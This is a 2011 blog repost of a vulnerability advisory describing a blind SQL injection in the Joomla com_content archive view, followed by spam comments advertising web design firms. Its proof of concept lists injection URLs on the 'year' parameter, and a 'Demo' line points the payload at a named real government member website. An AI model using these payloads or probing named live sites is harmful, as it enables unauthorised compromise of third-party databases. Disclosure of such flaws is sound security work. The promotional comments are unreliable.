Sunday, November 13, 2011

Joomla Component (com_content) - Blind SQL Vulnerability

Date:
=====
2011-11-11


References:
===========
http://www.vulnerability-lab.com/get_content.php?id=323


VL-ID:
=====
323


Introduction:
=============
Joomla is a free and open source content management system (CMS) for publishing content on
the World Wide Web and intranets and a model–view–controller (MVC) Web application framework
that can also be used independently.
Joomla is written in PHP, uses object-oriented programming (OOP) techniques and software design
patterns[citation needed], stores data in a MySQL database, and includes features such as page
caching, RSS feeds, printable versions of pages, news flashes, blogs, polls, search, and support
for language internationalization.
Joomla had been downloaded 23 million times. Between March 2007 and February 2011 there had been
more than 21 million downloads. There are over 7,400 free and commercial extensions available
from the official Joomla! Extension Directory and more available from other sources

(Copy of the Vendor Website: http://en.wikipedia.org/wiki/Joomla!)


Abstract:
=========
A vulnerability laboratory researcher discovered a Blind SQL Injection vulnerability on the com_content component of the joomla CMS.


Status:
========
Published


Exploitation-Technique:
=======================
Remote


Severity:
=========
Critical


Details:
========
A blind SQL Injection vulnerability was detected on the com_content component of the joomla CMS.
The vulnerability allows an attacker (remote) to inject/execute own sql statements on the affected application dbms.
Successful exploitation of the vulnerability can result in compromise of the affected application dbms.

Vulnerable Module(s):
                            [+] com_content


Proof of Concept:
=================
The vulnerability can be exploited be remote attackers. For demonstration or reproduce ...

1: [Site]/joomla/index.php?option=com_content&view=archive&year=1 [BSQLI]     
                                                                                
2: [Site]/joomla/index.php?option=com_content&view=archive&year=-1 or 1=1--   
                                                                                
3: [Site]/joomla/index.php?option=com_content&view=archive&year=-1 or 1=0--   


[x] Demo :

http://www.paul.house.gov/index.php?option=com_content&view=archive&year=-1 or 1=0--


Risk:
=====
The security risk of the blind sql injection vulnerability is estimated as critical.


Credits:
========
E.Shahmohamadi


12 comments:

  1. Thanks for sharing your info. I really appreciate your efforts and I will be waiting for your further write ups thanks once again.

    ReplyDelete
  2. very nice thanks for sharing

    hey friend see snow on google
    Type “Let It Snow” on @Google If you click and drag you can wipe the snow away. It is great. source: http://le-titsnow.blogspot.com

    ReplyDelete
  3. This was a nice post and I think it is pretty easy to see from the other comments as well that this post is well written and informative. Thanks a lot.
    source: www.wbupdates.com

    ReplyDelete
  4. There are many types of Joomla components. Some are used to manage a review site or manage the review portion of your web site. This Joomla component allows users to comment and rate.Joomla Web Design

    ReplyDelete
  5. Very nice article presents some useful points...It is good to read and have a nice points on Joomla.Thanks for sharing here.
    joomla website

    ReplyDelete
  6. To get business development create the websites using Joomla. Joomla Extensions and components provides quality and satisfied customers. Migration, Notification system, mailclimp and notes components provinding well websites. Zinavo Technologies

    ReplyDelete
  7. I love learning from others and this article shows me how much I still have to learn. I hope to see more posts in the future.

    ReplyDelete
  8. Joomla is a proficient in a range of programming language. Tasked with altering and extending including PHP, but less familiar such as CSS or Java Script. Developers found in the category of development.
    Web Design Bangalore | SEO Consultant Bangalore

    ReplyDelete
  9. Joomla development provides easy to follow extensions and extensions you can use to make publishing more streamlined and easier, enabling you to get increased traffic, and help you to enhance your money.

    Web Development Company | Best SEO Company in Bangalore

    ReplyDelete
  10. I read your post. Really it's a interesting post by you.Thanks for all the reviews you write about Joomla Extension. This design looks really beautiful.
    Joomla Feed

    ReplyDelete
  11. Joomla is a best seo friendly web development platform to get more business visibility in search engines.

    Digital Marketing Firms in Bangalore | Digital Marketing Agency Bangalore

    ReplyDelete
  12. The information is quite brilliant to read and execute. Thanks for the wonderful information given in the post.

    Responsive Web Design Indore
    Website Development Indore
    Joomla Web Development Company in Indore

    ReplyDelete